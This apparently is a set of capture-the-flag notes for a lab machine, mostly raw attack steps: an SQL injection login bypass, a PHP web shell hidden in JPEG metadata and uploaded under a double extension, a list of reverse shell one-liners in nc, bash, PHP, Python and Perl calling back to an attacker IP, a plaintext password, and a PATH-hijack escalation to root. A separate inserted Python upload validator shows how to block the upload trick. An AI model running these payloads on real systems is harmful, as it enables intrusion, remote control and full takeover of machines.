
10.10.10.185 - Machine IP
//login credentials

' OR 1=1 -- //user/pwd

//10.10.14.106 = LHOST (ip v4 from ifconfig tun0)

//Method 1
upload the shell.php.jpg
//Method 2

Download a simple .jpeg image.

1) exiftool -DocumentName="<h1>Enoxx<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';}__halt_compiler();?></h1>" image.jpeg

2) Rename and upload as image.php.jpeg
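As an added defensive example (not part of these notes), a server-side upload check that rejects both tricks used above: the double extension (image.php.jpeg) and PHP smuggled into image metadata. The sample blobs and the accepted-type table are constructed here.

```python
import re

# Added mitigation check (not from the original notes). Constructed inputs below.
# Allowed image extensions mapped to the magic bytes the content must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
SCRIPT_EXTS = {"php", "php3", "php5", "php7", "phtml", "phar"}
# Text that has no business inside an image: PHP open tags and the
# __halt_compiler() trick used to stop the parser before the binary data.
PHP_MARKERS = re.compile(rb"<\?php|<\?=|__halt_compiler", re.IGNORECASE)


def check_upload(filename: str, data: bytes) -> list[str]:
    """Return the reasons to reject an upload; an empty list means accept."""
    problems = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    ext = "jpg" if ext == "jpeg" else ext
    if len(parts) != 2:
        # image.php.jpeg has two extensions; some handlers execute the inner one
        problems.append("filename must be name.ext with exactly one extension")
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        problems.append("script extension present in filename")
    if ext not in ALLOWED:
        problems.append(f"extension {ext!r} is not an allowed image type")
    elif not data.startswith(ALLOWED[ext]):
        problems.append("file content does not match the claimed image type")
    if PHP_MARKERS.search(data):
        problems.append("PHP code found inside image data")
    return problems


# Constructed samples: a minimal JPEG-like blob, and the same blob with a PHP
# tag planted in an APP1 (Exif) segment, which is where exiftool writes tags.
CLEAN_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
PHP_TAG = b"<?php echo 'probe'; __halt_compiler(); ?>"
POLYGLOT_JPEG = (b"\xff\xd8\xff\xe1" + (len(PHP_TAG) + 8).to_bytes(2, "big")
                 + b"Exif\x00\x00" + PHP_TAG + b"\xff\xd9")

if __name__ == "__main__":
    for name, blob in [("image.jpeg", CLEAN_JPEG), ("image.php.jpeg", POLYGLOT_JPEG),
                       ("shell.php", POLYGLOT_JPEG)]:
        print(name, "->", check_upload(name, blob) or "accepted")
```

The metadata scan is deliberately simple; a production check would also re-encode the image with an image library so that any metadata is dropped before the file is stored.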

nc -e /bin/sh 10.10.14.106 3234


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.106 3234 >/tmp/f
bash -i >& /dev/tcp/10.10.14.125/3234 0>&1

//Payloads

php -r '$sock=fsockopen("10.10.14.106",3234);exec("/bin/sh -i <&3 >&3 2>&3");'


python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.106",3234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.10.14.106";$p=3234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

//or python instead of python3 (for a 2.x interpreter)

//upgrade the reverse shell to a tty
python3 -c 'import pty; pty.spawn("/bin/sh")'

As user theseus
//su theseus

Th3s3usW4sK1ng

//method 1

//host python2 server

python2 -m SimpleHTTPServer 8080

on the target machine we have: wget "http://10.10.14.125:8080/lshw"

where lshw is the payload above on the host machine (our kali or whatever distro)
cd ubo
chmod 777 lshw
export PATH=/tmp/ubo:$PATH
./sysinfo
//also works with method 2

cd /tmp
echo "/bin/bash" > lshw
export PATH=/tmp/ubo:$PATH
echo $PATH
export PATH=/tmp:$PATH
cd /bin
./sysinfo

afterwards, back in the ... (now root) shell, run

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.106",7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
//listener for both methods
as above, open a listener on 7777 and spawn a shell
